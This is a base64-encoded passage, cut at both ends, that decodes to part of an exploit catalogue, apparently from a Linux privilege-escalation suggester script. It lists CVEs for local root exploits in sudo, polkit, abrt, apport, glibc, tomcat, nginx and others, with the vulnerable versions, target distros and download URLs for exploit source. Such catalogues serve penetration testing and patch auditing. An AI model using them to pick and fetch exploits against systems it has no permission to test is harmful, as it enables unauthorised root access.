TV7c3lzdGVtdGFwOjEuMS0zLmVsNX0sZmVkb3JhPTEze3N5c3RlbXRhcDoxLjItMS5mYzEzfQpSYW5rOiAxCmF1dGhvcjogVGF2aXMgT3JtYW5keQpleHBsb2l0LWRiOiAxNTYyMApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxMS0xNDg1XSR7dHh0cnN0fSBwa2V4ZWMKUmVxczogcGtnPXBvbGtpdCx2ZXI9MC45NgpUYWdzOiBSSEVMPTYsdWJ1bnR1PTEwLjA0fDEwLjEwClJhbms6IDEKZXhwbG9pdC1kYjogMTc5NDIKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTEtMjkyMV0ke3R4dHJzdH0ga3RzdXNzClJlcXM6IHBrZz1rdHN1c3MsdmVyPD0xLjQKVGFnczogc3Bhcmt5PTV8NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDExLzA4LzEzLzIKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9tYXN0ZXIvQ1ZFLTIwMTEtMjkyMS9rdHN1c3MtbHBlLnNoCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDEyLTA4MDldJHt0eHRyc3R9IGRlYXRoX3N0YXIgKHN1ZG8pClJlcXM6IHBrZz1zdWRvLHZlcj49MS44LjAsdmVyPD0xLjguMwpUYWdzOiBmZWRvcmE9MTYgClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwOi8vc2VjbGlzdHMub3JnL2Z1bGxkaXNjbG9zdXJlLzIwMTIvSmFuL2F0dC01OTAvYWR2aXNvcnlfc3Vkby50eHQKZXhwbG9pdC1kYjogMTg0MzYKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTQtMDQ3Nl0ke3R4dHJzdH0gY2hrcm9vdGtpdApSZXFzOiBwa2c9Y2hrcm9vdGtpdCx2ZXI8MC41MApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9zZWNsaXN0cy5vcmcvb3NzLXNlYy8yMDE0L3EyLzQzMApleHBsb2l0LWRiOiAzMzg5OQpDb21tZW50czogUm9vdGluZyBkZXBlbmRzIG9uIHRoZSBjcm9udGFiICh1cCB0byBvbmUgZGF5IG9mIGRlbGF5KQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNC01MTE5XSR7dHh0cnN0fSBfX2djb252X3RyYW5zbGl0X2ZpbmQKUmVxczogcGtnPWdsaWJjfGxpYmM2LHg4NgpUYWdzOiBkZWJpYW49NgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvbS8yMDE0LzA4L3RoZS1wb2lzb25lZC1udWwtYnl0ZS0yMDE0LWVkaXRpb24uaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy8zNDQyMS50YXIuZ3oKZXhwbG9pdC1kYjogMzQ0MjEKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtMTg2Ml0ke3R4dHJzdH0gbmV3cGlkIChhYnJ0KQpSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MjAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMzE1XSR7dHh0cnN0fSByYWNlYWJydApSZXFzOiBwa2c9YWJydCxjbWQ6Z3JlcCAtcWkgYWJydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiBmZWRvcmE9MTl7YWJydDoyLjEuNS0xLmZjMTl9LGZlZG9yYT0yMHthYnJ0OjIuMi4yLTIuZmMyMH0sZmVkb3JhPTIxe2FicnQ6Mi4zLjAtMy5mYzIxfSxSSEVMPTd7YWJydDoyLjEuMTEtMTIuZWw3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvMTMwCnNyYy11cmw6IGh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20vdGF2aXNvL2ZlMzU5MDA2ODM2ZDZjZDEwOTFlL3Jhdy8zMmZlODQ4MWM0MzRmOGNhZDViY2Y4NTI5Nzg5MjMxNjI3ZTUwNzRjL3JhY2VhYnJ0LmMKZXhwbG9pdC1kYjogMzY3NDcKYXV0aG9yOiBUYXZpcyBPcm1hbmR5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTEzMThdJHt0eHRyc3R9IG5ld3BpZCAoYXBwb3J0KQpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly9vcGVud2FsbC5jb20vbGlzdHMvb3NzLXNlY3VyaXR5LzIwMTUvMDQvMTQvNApzcmMtdXJsOiBodHRwczovL2dpc3QuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Rhdmlzby8wZjAyYzI1NWMxM2M1YzExMzQwNi9yYXcvZWFmYWM3OGRjZTUxMzI5YjAzYmVhNzE2N2YxMjcxNzE4YmVlNGRjYy9uZXdwaWQuYwpleHBsb2l0LWRiOiAzNjc0NgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xMzE4XSR7dHh0cnN0fSBuZXdwaWQgKGFwcG9ydCkgMgpSZXFzOiBwa2c9YXBwb3J0LHZlcj49Mi4xMyx2ZXI8PTIuMTcsY21kOmdyZXAgLXFpIGFwcG9ydCAvcHJvYy9zeXMva2VybmVsL2NvcmVfcGF0dGVybgpUYWdzOiB1YnVudHU9MTQuMDQuMgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL29wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8wNC8xNC80CmV4cGxvaXQtZGI6IDM2NzgyCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE1LTMyMDJdJHt0eHRyc3R9IGZ1c2UgKGZ1c2VybW91bnQpClJlcXM6IHBrZz1mdXNlLHZlcjwyLjkuMwpUYWdzOiBkZWJpYW49Ny4wfDguMCx1YnVudHU9KgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL3NlY2xpc3RzLm9yZy9vc3Mtc2VjLzIwMTUvcTIvNTIwCmV4cGxvaXQtZGI6IDM3MDg5CkNvbW1lbnRzOiBOZWVkcyBjcm9uIG9yIHN5c3RlbSBhZG1pbiBpbnRlcmFjdGlvbgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0xODE1XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdApSZXFzOiBwa2c9c2V0cm91Ymxlc2hvb3QsdmVyPDMuMi4yMgpUYWdzOiBmZWRvcmE9MjEKUmFuazogMQpleHBsb2l0LWRiOiAzNjU2NApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS0zMjQ2XSR7dHh0cnN0fSB1c2VyaGVscGVyClJlcXM6IHBrZz1saWJ1c2VyLHZlcjw9MC42MApUYWdzOiBSSEVMPTZ7bGlidXNlcjowLjU2LjEzLSg0fDUpLmVsNn0sUkhFTD02e2xpYnVzZXI6MC42MC01LmVsN30sZmVkb3JhPTEzfDE5fDIwfDIxfDIyClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTUvMDcvMjMvY3ZlLTIwMTUtMzI0NS1jdmUtMjAxNS0zMjQ2L2N2ZS0yMDE1LTMyNDUtY3ZlLTIwMTUtMzI0Ni50eHQgCmV4cGxvaXQtZGI6IDM3NzA2CkNvbW1lbnRzOiBSSEVMIDUgaXMgYWxzbyB2dWxuZXJhYmxlLCBidXQgaW5zdGFsbGVkIHZlcnNpb24gb2YgZ2xpYmMgKDIuNSkgbGFja3MgZnVuY3Rpb25zIG5lZWRlZCBieSByb290aGVscGVyLmMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTUtNTI4N10ke3R4dHJzdH0gYWJydC9zb3NyZXBvcnQtcmhlbDcKUmVxczogcGtnPWFicnQsY21kOmdyZXAgLXFpIGFicnQgL3Byb2Mvc3lzL2tlcm5lbC9jb3JlX3BhdHRlcm4KVGFnczogUkhFTD03e2FicnQ6Mi4xLjExLTEyLmVsN30KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xCnNyYy11cmw6IGh0dHBzOi8vd3d3Lm9wZW53YWxsLmNvbS9saXN0cy9vc3Mtc2VjdXJpdHkvMjAxNS8xMi8wMS8xLzEKZXhwbG9pdC1kYjogMzg4MzIKYXV0aG9yOiByZWJlbApFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS02NTY1XSR7dHh0cnN0fSBub3RfYW5fc3NobnVrZQpSZXFzOiBwa2c9b3BlbnNzaC1zZXJ2ZXIsdmVyPj02LjgsdmVyPD02LjkKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI2LzIKZXhwbG9pdC1kYjogNDExNzMKYXV0aG9yOiBGZWRlcmljbyBCZW50bwpDb21tZW50czogTmVlZHMgYWRtaW4gaW50ZXJhY3Rpb24gKHJvb3QgdXNlciBuZWVkcyB0byBsb2dpbiB2aWEgc3NoIHRvIHRyaWdnZXIgZXhwbG9pdGF0aW9uKQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNS04NjEyXSR7dHh0cnN0fSBibHVlbWFuIHNldF9kaGNwX2hhbmRsZXIgZC1idXMgcHJpdmVzYwpSZXFzOiBwa2c9Ymx1ZW1hbix2ZXI8Mi4wLjMKVGFnczogZGViaWFuPTh7Ymx1ZW1hbjoxLjIzfQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly90d2l0dGVyLmNvbS90aGVncnVncS9zdGF0dXMvNjc3ODA5NTI3ODgyODEzNDQwCmV4cGxvaXQtZGI6IDQ2MTg2CmF1dGhvcjogU2ViYXN0aWFuIEtyYWhtZXIKQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTEyNDBdJHt0eHRyc3R9IHRvbWNhdC1yb290cHJpdmVzYy1kZWIuc2gKUmVxczogcGtnPXRvbWNhdApUYWdzOiBkZWJpYW49OCx1YnVudHU9MTYuMDQKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL1RvbWNhdC1EZWJQa2dzLVJvb3QtUHJpdmlsZWdlLUVzY2FsYXRpb24tRXhwbG9pdC1DVkUtMjAxNi0xMjQwLmh0bWwKc3JjLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvdG9tY2F0LXJvb3Rwcml2ZXNjLWRlYi5zaApleHBsb2l0LWRiOiA0MDQ1MAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBBZmZlY3RzIG9ubHkgRGViaWFuLWJhc2VkIGRpc3Ryb3MKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtMTI0N10ke3R4dHJzdH0gbmdpbnhlZC1yb290LnNoClJlcXM6IHBrZz1uZ2lueHxuZ2lueC1mdWxsLHZlcjwxLjEwLjMKVGFnczogZGViaWFuPTgsdWJ1bnR1PTE0LjA0fDE2LjA0fDE2LjEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9OZ2lueC1FeHBsb2l0LURlYi1Sb290LVByaXZFc2MtQ1ZFLTIwMTYtMTI0Ny5odG1sCnNyYy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi0xMjQ3L25naW54ZWQtcm9vdC5zaApleHBsb2l0LWRiOiA0MDc2OAphdXRob3I6IERhd2lkIEdvbHVuc2tpCkNvbW1lbnRzOiBSb290aW5nIGRlcGVuZHMgb24gY3Jvbi5kYWlseSAodXAgdG8gMjRoIG9mIGRlbGF5KS4gQWZmZWN0ZWQ6IGRlYjg6IDwxLjYuMjsgMTQuMDQ6IDwxLjQuNjsgMTYuMDQ6IDEuMTAuMDsgZ2VudG9vOiA8MS4xMC4yLXIzCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDE2LTE1MzFdJHt0eHRyc3R9IHBlcmxfc3RhcnR1cCAoZXhpbSkKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTU0OQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi0xNTMxXSR7dHh0cnN0fSBwZXJsX3N0YXJ0dXAgKGV4aW0pIDIKUmVxczogcGtnPWV4aW0sdmVyPDQuODYuMgpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHA6Ly93d3cuZXhpbS5vcmcvc3RhdGljL2RvYy9DVkUtMjAxNi0xNTMxLnR4dApleHBsb2l0LWRiOiAzOTUzNQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi00OTg5XSR7dHh0cnN0fSBzZXRyb3VibGVzaG9vdCAyClJlcXM6IHBrZz1zZXRyb3VibGVzaG9vdApUYWdzOiBSSEVMPTZ8NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9jLXNraWxscy5ibG9nc3BvdC5jb20vMjAxNi8wNi9sZXRzLWZlZWQtYXR0YWNrZXItaW5wdXQtdG8tc2gtYy10by1zZWUuaHRtbApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vc3RlYWx0aC90cm91Ymxlc2hvb3Rlci9yYXcvbWFzdGVyL3N0cmFpZ2h0LXNob290ZXIuYwpleHBsb2l0LWRiOgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi01NDI1XSR7dHh0cnN0fSB0b21jYXQtUkgtcm9vdC5zaApSZXFzOiBwa2c9dG9tY2F0ClRhZ3M6IFJIRUw9NwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cDovL2xlZ2FsaGFja2Vycy5jb20vYWR2aXNvcmllcy9Ub21jYXQtUmVkSGF0LVBrZ3MtUm9vdC1Qcml2RXNjLUV4cGxvaXQtQ1ZFLTIwMTYtNTQyNS5odG1sCnNyYy11cmw6IGh0dHA6Ly9sZWdhbGhhY2tlcnMuY29tL2V4cGxvaXRzL3RvbWNhdC1SSC1yb290LnNoCmV4cGxvaXQtZGI6IDQwNDg4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFmZmVjdHMgb25seSBSZWRIYXQtYmFzZWQgZGlzdHJvcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi02NjYzLENWRS0yMDE2LTY2NjR8Q1ZFLTIwMTYtNjY2Ml0ke3R4dHJzdH0gbXlzcWwtZXhwbG9pdC1jaGFpbgpSZXFzOiBwa2c9bXlzcWwtc2VydmVyfG1hcmlhZGItc2VydmVyLHZlcjw1LjUuNTIKVGFnczogdWJ1bnR1PTE2LjA0LjEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL015U1FMLU1hcmlhLVBlcmNvbmEtUHJpdkVzY1JhY2UtQ1ZFLTIwMTYtNjY2My01NjE2LUV4cGxvaXQuaHRtbApzcmMtdXJsOiBodHRwOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi02NjYzL215c3FsLXByaXZlc2MtcmFjZS5jCmV4cGxvaXQtZGI6IDQwNjc4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsc28gTWFyaWFEQiB2ZXI8MTAuMS4xOCBhbmQgdmVyPDEwLjAuMjggYWZmZWN0ZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTU2Nl0ke3R4dHJzdH0gbmFnaW9zLXJvb3QtcHJpdmVzYwpSZXFzOiBwa2c9bmFnaW9zLHZlcjw0LjIuNApUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tL2Fkdmlzb3JpZXMvTmFnaW9zLUV4cGxvaXQtUm9vdC1Qcml2RXNjLUNWRS0yMDE2LTk1NjYuaHRtbApzcmMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvQ1ZFLTIwMTYtOTU2Ni9uYWdpb3Mtcm9vdC1wcml2ZXNjLnNoCmV4cGxvaXQtZGI6IDQwOTIxCmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsbG93cyBwcml2IGVzY2FsYXRpb24gZnJvbSBuYWdpb3MgdXNlciBvciBuYWdpb3MgZ3JvdXAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMDM1OF0ke3R4dHJzdH0gbnRmcy0zZy1tb2Rwcm9iZQpSZXFzOiBwa2c9bnRmcy0zZyx2ZXI8MjAxNy40ClRhZ3M6IHVidW50dT0xNi4wNHtudGZzLTNnOjIwMTUuMy4xNEFSLjEtMWJ1aWxkMX0sZGViaWFuPTcuMHtudGZzLTNnOjIwMTIuMS4xNUFSLjUtMi4xK2RlYjd1Mn0sZGViaWFuPTguMHtudGZzLTNnOjIwMTQuMi4xNUFSLjItMStkZWI4dTJ9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTA3MgpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80MTM1Ni56aXAKZXhwbG9pdC1kYjogNDEzNTYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuIExpbnV4IGhlYWRlcnMgbXVzdCBiZSBpbnN0YWxsZWQuIFN5c3RlbSBtdXN0IGhhdmUgYXQgbGVhc3QgdHdvIENQVSBjb3Jlcy4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTg5OV0ke3R4dHJzdH0gcy1uYWlsLXByaXZnZXQKUmVxczogcGtnPXMtbmFpbCx2ZXI8MTQuOC4xNgpUYWdzOiB1YnVudHU9MTYuMDQsbWFuamFybz0xNi4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcvMQpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy01ODk5L2V4cGxvaXQuc2gKYXV0aG9yOiB3YXBpZmxhcGkgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2N10ke3R4dHJzdH0gU3Vkb2VyLXRvLXJvb3QKUmVxczogcGtnPXN1ZG8sdmVyPD0xLjguMjAsY21kOlsgLWYgL3Vzci9zYmluL2dldGVuZm9yY2UgXQpUYWdzOiBSSEVMPTd7c3VkbzoxLjguNnA3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc3Vkby53cy9hbGVydHMvbGludXhfdHR5Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA1LzMwL2N2ZS0yMDE3LTEwMDAzNjcvbGludXhfc3Vkb19jdmUtMjAxNy0xMDAwMzY3LmMKZXhwbG9pdC1kYjogNDIxODMKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IE5lZWRzIHRvIGJlIHN1ZG9lci4gV29ya3Mgb25seSBvbiBTRUxpbnV4IGVuYWJsZWQgc3lzdGVtcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzY3XSR7dHh0cnN0fSBzdWRvcHduClJlcXM6IHBrZz1zdWRvLHZlcjw9MS44LjIwLGNtZDpbIC1mIC91c3Ivc2Jpbi9nZXRlbmZvcmNlIF0KVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnN1ZG8ud3MvYWxlcnRzL2xpbnV4X3R0eS5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jMGQzejNyMC9zdWRvLUNWRS0yMDE3LTEwMDAzNjcvbWFzdGVyL3N1ZG9wd24uYwpleHBsb2l0LWRiOgphdXRob3I6IGMwZDN6M3IwCkNvbW1lbnRzOiBOZWVkcyB0byBiZSBzdWRvZXIuIFdvcmtzIG9ubHkgb24gU0VMaW51eCBlbmFibGVkIHN5c3RlbXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcwXSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDYvMTkvc3RhY2stY2xhc2gvc3RhY2stY2xhc2gudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9saW51eF9sZHNvX2h3Y2FwLmMKZXhwbG9pdC1kYjogNDIyNzQKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IFVzZXMgIlN0YWNrIENsYXNoIiB0ZWNobmlxdWUsIHdvcmtzIGFnYWluc3QgbW9zdCBTVUlELXJvb3QgYmluYXJpZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcxXSR7dHh0cnN0fSBsaW51eF9sZHNvX2R5bmFtaWMKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczogZGViaWFuPTl8MTAsdWJ1bnR1PTE0LjA0LjV8MTYuMDQuMnwxNy4wNCxmZWRvcmE9MjN8MjR8MjUKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29fZHluYW1pYy5jCmV4cGxvaXQtZGI6IDQyMjc2CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOiBVc2VzICJTdGFjayBDbGFzaCIgdGVjaG5pcXVlLCB3b3JrcyBhZ2FpbnN0IG1vc3QgU1VJRC1yb290IFBJRXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzc5XSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwXzY0ClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2XzY0ClRhZ3M6IGRlYmlhbj03Ljd8OC41fDkuMCx1YnVudHU9MTQuMDQuMnwxNi4wNC4yfDE3LjA0LGZlZG9yYT0yMnwyNSxjZW50b3M9Ny4zLjE2MTEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVh